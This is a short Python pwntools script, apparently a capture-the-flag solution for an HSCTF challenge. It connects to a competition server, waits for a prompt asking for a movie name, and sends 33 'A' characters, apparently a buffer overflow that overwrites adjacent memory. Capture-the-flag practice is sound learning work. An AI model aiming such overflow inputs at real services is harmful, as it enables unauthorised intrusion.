from pwn import * p = remote("shell.hsctf.com", 10000) p.recvuntil("What was the name of the last movie you watched?\n") p.send('A' * 33)